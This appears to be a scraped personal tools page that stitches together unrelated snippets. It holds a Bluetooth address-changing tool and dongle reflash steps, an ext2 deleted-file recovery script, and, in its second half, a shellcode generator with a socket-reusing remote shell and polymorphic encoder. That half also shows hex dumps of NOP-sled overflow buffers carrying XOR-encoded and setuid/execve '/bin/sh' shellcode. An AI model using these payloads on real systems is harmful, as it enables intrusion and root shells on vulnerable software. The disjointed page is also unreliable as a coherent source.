Link: www.vimeo.com

Datasheet Toshiba LED Dot Matrix Modul TLMM 501 B2

Usage:

root@linux:~/devel/tech/bluetooth/# ./setbtaddr hci0 01:0E:07:75:B7:12
Exec './bccmd  -d hci0 psset -r bdaddr 0x75 0x00 0x12 0xB7 0x07 0x00 0x0E 0x01'
hci0:   Type: USB
        BD Address: 01:0E:07:75:B7:12 ACL MTU: 192:8 SCO MTU: 64:8
        UP RUNNING
        RX bytes:86 acl:0 sco:0 events:9 errors:0
        TX bytes:33 acl:0 sco:0 commands:9 errors:0

download

Mini Howto:

#Backup old firmware
dfutool -d hci0 archiv backup.dfu
# Backup config
bccmd -d hci0 pslist -s 0x000F >> backup_cfg
# Check Vendor ID ( has to be 0x0a12)
bccmd -d hci0 psget -s 0x000f 0x02be
# Write new Product ID
bccmd -d hci0 psset -s 0x0002 0x02bf 0x0002 

Setup a test image:

dd  if=/dev/zero of=image  bs=1k count=8192
mkfs.ext2 image
mount -o loop image /mnt/image
cp something /mnt/image
rm /mnt/image/something
sync
umount /mnt/image

Now you can start the script to find a token of the deleted file:

./find.sh image “Test”

The Code for find.sh

#!/bin/sh
 
IMAGE=$1
TOKEN=$2
BSIZE=1024
TYPE="linux-ext2"
TMP="dls_$(date +%Y%d%m_%H%M%S)"
 
if [ $# -ne 2 ]
then
    echo "Usage: $0 image token"
    exit -1
fi
 
if [ ! -f $IMAGE ]
then
  echo "Cannot find $IMAGE"
  exit -1
fi
 
if [  -z "$TOKEN" ]
then
  echo "Pleae give search token"
  exit -1
fi
 
echo "--------------------------"
echo "Found deleted"
fls -f $TYPE -rd $IMAGE
dls -f $TYPE $IMAGE > $TMP
strings -t d $TMP > $TMP.str
echo "--------------------------"
grep -i "$TOKEN" $TMP.str
echo "--------------------------"
echo -en "Select Offset:"
read n
ADDR=$(grep -i "$TOKEN" $TMP.str | grep "$n" |  sed 's/^[ \t]*//' | head -n 1 | cut -d " " -f1)
if [ -z "$ADDR" ]
then
    echo "Nothing found for '$TOKEN'"
    exit -1
fi
echo "Found $ADDR"
OFFSET=$(echo "$ADDR / $BSIZE" | bc)
echo "Using Offset $OFFSET"
BLOCK=$(dcalc -f $TYPE  -u $OFFSET  $IMAGE)
echo "Using Block $BLOCK"
echo "----------------------------"
dcat -f $TYPE  $IMAGE  $BLOCK
echo
echo "----------------------------"
INODE=$(ifind -f $TYPE  $IMAGE -d $BLOCK)
echo "Found Inode $INODE"
istat -f $TYPE $IMAGE $INODE
BLOCKS=$(istat -f $TYPE $IMAGE $INODE | tail -n 1)
echo "---------------------------"
echo "Found Blocks $BLOCKS"
echo "---------------------------"
(for BLOCK in $BLOCKS
do
   dcat -f $TYPE  $IMAGE  $BLOCK
done) | tee $TMP.found
echo "---------------------------"
echo "Saved to $TMP.found"
echo "---------------------------"
rm -f $TMP $TMP.str

Features:

• Python script that generates the shellcode
• Re-uses the listen socket of the victim and connects it to new shell
• Scans for correct fd and peername
• Embedded Telnet client which connects to created remote shell

• Encoder to generate polymorph shellcode

  Download

Changelog:

• Use getopt for command line parsing
• Fixed off by one bug in hex dump output
• Added simple shellcode encryption

./mkbuffer -m gen -l 256 -c xor -o 2 -f CODE -e CODE
------------------------------------------------------
Start: 0x0x80499a0
End:   0x0x80499c9
Len:   0x0029 (41 bytes)
jump:  0x00000000
------------------------------------------------------
Crypt Shellcode 'xor' offset='2'
------------------------------------------------------
0x0000:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:eb 11 5e 31 c9 b1 36 80 74 0e ff 02 80 e9 01 75
0x0075:f6 eb 05 e8 ea ff ff ff 33 c2 b2 44 33 d9 33 cb
0x00cb:cf 82 e9 12 59 33 c2 8a 41 05 52 51 8b e3 b2 09
0x0009:33 d0 cf 82 ea e9 fd fd fd 2d 60 6b 6c 2d 71 6a
0x006a:5a 92 92 92 57 8b e7 55 54 33 f4 51 ea 8c 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
------------------------------------------------------
Writing Shellcode to 'CODE'
------------------------------------------------------
Starting Subshell
setup env $CODE
------------------------------------------------------

Download

My simple tool is used to prepare buffers with shellcode.The actual asm code is done with nasm and linked a against a gcc main programm. The programm has three modes: dump, exec and gen.

Dump does a hexdump of the plain shellcode, usefull when tracing null bytes.

For testing the functionality of the shellcode you can use exec which simple calls the shellcode like function.

Gen is used to build a buffer with the actual shellcode. The code is hexdumped to stdout, raw code it written to stderr and also the enviroment var $CODE is set. Also the target buffer size and stack jump address as to be passed to the program. The buffer ist first filled with the jump address and then the first half with NOPs overwritten. The shellcode gets copied to the middle of the buffer.

./mkbuffer gen 256  0x1234567
Start: 0x0x8048bb0
End:   0x0x8048bd9
Len:   0x29 (41 bytes)
jump:  0x1234567
90
0x0000:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0010:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0020:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0030:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0040:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0050:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0060:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0070:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 31
0x0080:c0 b0 46 31 db 31 c9 cd 80 eb 10 5b 31 c0 88 43
0x0090:07 50 53 89 e1 b0 0b 31 d2 cd 80 e8 eb ff ff ff
0x00a0:2f 62 69 6e 2f 73 68 58 45 23 01 67 45 23 01 67
0x00b0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
0x00c0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
0x00d0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
0x00e0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
0x00f0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01
setup env $CODE

Download